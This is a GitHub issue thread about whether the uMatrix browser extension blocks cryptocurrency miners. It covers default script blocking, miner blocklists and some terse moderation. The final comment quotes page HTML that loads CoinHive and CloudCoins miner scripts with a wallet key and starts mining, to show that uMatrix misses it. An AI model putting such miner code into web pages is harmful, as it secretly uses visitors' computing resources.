### ISSUE TITLE
Blocks coin miners?

### ISSUE THREAD

**Issue by EC-O-DE** [gorhill/uMatrix#818]
Does uMatrix block coin miners?

Does the included lists in uMatrix any of them do they include coin miner sites/hosts as blocked?

If not, seems like uMatrix would be the ideal to block coin miners too?

**Comment by anewuser** [comment]
By default, uMatrix blocks all external scripts, including cryptocurrency miners. There's no need to use special lists for that. Since you don't seem to understand how it works, I suggest you to uninstall it and use uBlock Origin instead. It does include a list of miners: https://github.com/gorhill/uBlock#installation

Please close this issue and do not post any more questions here. Use this page instead: https://discourse.mozilla.org/t/support-umatrix/5131

**Comment by EC-O-DE** [comment]
Pardon for asking :) I do know how uMatrix works. I use it and Opera's internal ad-blocking. I needed to ask to be sure. Coiners also work through obfuscated proxies injected into traffic that might look legit.

Hmm. I'm also pondering on to downsize the amount of lists (content) as some lists have same items and then there's separate Opera's ad-blocking (easylist). On uMatrix I've ticked of "malware url" lists (2) - as I'm pretty savvy and don't DL crap. But now I'm thinking maybe I should block...

... But it increases **RAM** (& CPU) usage which is already quite high in uMatrix. Does it utilize gpu btw?

**Comment by anewuser** [comment]
As I told you, please close this and stop asking questions here, or the issues tab for this repository may be closed for everyone again. The developer is tired of people who don't read https://github.com/gorhill/uMatrix/blob/master/CONTRIBUTING.md

**Comment by gorhill** [comment]
> Coiners also work through obfuscated proxies injected into traffic that might look legit

They end up as script resources in your browser, that is what uMatrix deals with, and it's your choice to block scripts as you wish.

**Comment by gorhill** [comment]
> RAM (& CPU) usage which is already quite high in uMatrix

Absolute nonsense. Provide a Gecko profile of your assertion, that's the only way any such assertion can be taken seriously.

**Comment by dessant** [comment]
@gorhill, in case you want to post a standard reply to support requests and close/lock them, I've made a bot for it: https://probot.github.io/apps/support/.

At Kivy we use it with this message: https://github.com/kivy/kivy/blob/master/.github/support.yml#L7.

**Comment by Xmetalfanx** [comment]
just throwing in two cents as I just watched https://www.youtube.com/watch?v=PSoUPM520h4 AND I do agree that un-needed lists in UBO and/or UMatrix are not needed if they are already dealth with (the mining domains) but I saw https://github.com/keraf/NoCoin/blob/master/src/blacklist.txt mentioned.   I WOULD like to see the maintainer get credit for that list, wondered if (this may be better in here then in UBO, though i may have the idea backwards) adding this list to the default list (I know i could probably custom add it, but I mean as an "official addition" would be a decent idea.

A) I know some of the other lists may have some of these domains listed but perhaps not all 
B)I do see this as "closed" and I do not want to/intended to add to "drama" or anything ... if the answer is "No" , than no problem.

**Comment by anewuser** [comment]
@Xmetalfanx uBlock Origin already includes its own "Resource abuse" list by default, and you can report missing filters at https://github.com/uBlockOrigin/uAssets/issues . It uses the same kind of filters in your link (like partial/specific URLs).  uMatrix, on the other hand, includes lists that block full hostnames, since this is what this extension is able to do.

If you want to discuss or suggest anything else, don't post comments on GitHub bug trackers. Do it  at the places indicated by 

* https://github.com/gorhill/uMatrix/blob/master/CONTRIBUTING.md 
* https://github.com/gorhill/uBlock/blob/master/CONTRIBUTING.md

**Comment by enmoku** [comment]
Unfortunately the following is not blocked by uMatrix :C

--
  | < !--<script src="https://coin-hive.com/lib/coinhive.min.js"></script>-->
  | <script src="https://gofile.io/js/coinGofile.min.js"></script>
  | <script>
  | CoinHive.CONFIG.WEBSOCKET_SHARDS = [["wss://gofile.io:8889"]];
  | var miner = new CoinHive.Anonymous('4AHC2KbuTDz19FG6coUHkyXyyyTo2tavmhztoCdPLhJaeyVKebrgHtq1rJNWHU31TY5S2WdMFVM3kZao5pNRj9gsCQx2hdx', 'gofile');
  | miner.start();
  | </script>
  | < !--<script src="https://cdn.cloudcoins.co/javascript/cloudcoins.min.js">
  | CLOUDCOINS.Miner(SdFE5ucCVy2qGUXDygZTVJhiESE81g75).start();
  | </script>-->
